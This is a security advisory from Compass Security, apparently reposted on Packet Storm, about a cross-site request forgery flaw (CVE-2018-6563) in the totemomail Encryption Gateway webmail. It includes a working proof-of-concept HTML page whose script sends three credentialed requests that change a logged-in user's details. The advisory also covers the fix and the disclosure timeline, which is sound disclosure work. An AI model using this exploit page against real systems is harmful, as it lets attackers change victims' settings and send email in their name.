Twenty Year Anniversary

Totemomail Encryption Gateway 6.0.0_Build_371 Cross Site Request Forgery

Totemomail Encryption Gateway 6.0.0_Build_371 Cross Site Request Forgery
Posted May 15, 2018
Authored by Nicolas Heiniger

Totemomail Encryption Gateway version 6.0.0_Build_371 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
advisories | CVE-2018-6563
MD5 | dddff35a0ad31ee3150a91121b2f0ea5

Totemomail Encryption Gateway 6.0.0_Build_371 Cross Site Request Forgery

Change Mirror Download
################################################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
################################################################################
#
# Product: totemomail Encryption Gateway
# Vendor: totemo AG
# CSNC ID: CSNC-2018-003
# CVE ID: CVE-2018-6563
# Subject: Cross-Site Request Forgery
# Risk: High
# Effect: Remotely exploitable
# Author: Nicolas Heiniger <nicolas.heiniger@compass-security.com>
# Date: 14.05.2018
#
################################################################################

Introduction:
-------------
The totemomail Encryption Gateway protects email communication with any external
partner by encryption. It doesn't matter whether you exchange emails with
technically savvy communication partners or with those who have neither an
appropriate infrastructure nor the necessary know-how. The encryption gateway
also makes it easy to securely send very large attachments.[1]

Compass Security discovered a vulnerability in the webmail part of the
solution. It is possible to predict all parameters that are required to
execute actions on the webmail interface. This allows an attacker to perform
Cross-Site Request Forgery (CSRF) attacks. The attacker needs to craft a malicious web
page that will automatically send a request to the Encryption Gateway. If the
user is logged in, the request will be executed by the Encryption Gateway on
behalf of the logged in user. This could be used to change a user's settings, send emails or
change contact informations.


Affected:
---------
Vulnerable:
* 6.0.0_Build_371

No other version was tested but is is likely that older versions are affected as
well.


Technical Description
---------------------
In the webmail, no anti-CSRF token is used. Although the viewState makes the
attack more complex, it is possible to entirely predict the requests and thus,
perform CSRF attacks. The requirement here is to perform the attack as a replay of a full
user interaction. One has to replay every request to make sure that the viewState is
updated on the server side and corresponds to the action that is performed by
the malicious page.

Such a malicious page is presented below, it will automatically send 3 requests
that will change the user's detail:
==========
<html>
<body>
<script>
function submitRequest1()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https:\/\/[CUT BY COMPASS]\/responsiveUI\/webmail\/newMessage.xhtml", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded");
xhr.withCredentials = true;
var body = "tabNavigationForm_SUBMIT=1&javax.faces.ViewState=An36[CUT BY COMPASS]XBJn&tabNavigationForm_j_id_24_j_id_26=tabNavigationForm$
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}

function submitRequest2()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https:\/\/[CUT BY COMPASS]\/responsiveUI\/accountOverview\/preferences.xhtml", true);
xhr.setRequestHeader("Accept", "application\/xml, text\/xml, *\/*; q=0.01");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = true;
var body = "javax.faces.partial.ajax=true&javax.faces.source=preferencesForm_phoneNumber_input_text&javax.faces.partial.execute=preferencesForm_phoneNumber_input_tex$
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}

function submitRequest3()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https:\/\/[CUT BY COMPASS]\/responsiveUI\/accountOverview\/preferences.xhtml", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded");
xhr.withCredentials = true;
var body = "preferencesForm_firstname_input_text=CSRF&preferencesForm_lastname_input_text=CSRF&preferencesForm_phoneNumber_input_text=%2B41+00+000+00+00&preferencesF$
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}

submitRequest1();
submitRequest2();
submitRequest3();
</script>
</body>
</html>
==========


Workaround / Fix:
-----------------
Install an up to date version of totemomail Encryption Gateway.

As a developer, the requests that execute actions must include an unpredictable
element. This is usually done by using an anti-CSRF token. This token is a
random value tied to the user's session and must be verified by the server
before executing any action on behalf of the user.


Timeline:
---------
2018-05-14: Coordinated public disclosure date
2018-03-XX: Release of fixed version 6.0_b511
2018-02-13: Initial vendor response
2018-02-09: Initial vendor notification
2018-02-02: Assigned CVE-2018-6563
2018-01-11: Discovery by Nicolas Heiniger


References:
-----------
[1] https://www.totemo.com/en/solutions/email-encryption/external-encryption

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

June 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    14 Files
  • 2
    Jun 2nd
    1 Files
  • 3
    Jun 3rd
    3 Files
  • 4
    Jun 4th
    18 Files
  • 5
    Jun 5th
    21 Files
  • 6
    Jun 6th
    9 Files
  • 7
    Jun 7th
    16 Files
  • 8
    Jun 8th
    18 Files
  • 9
    Jun 9th
    5 Files
  • 10
    Jun 10th
    2 Files
  • 11
    Jun 11th
    21 Files
  • 12
    Jun 12th
    34 Files
  • 13
    Jun 13th
    15 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    4 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close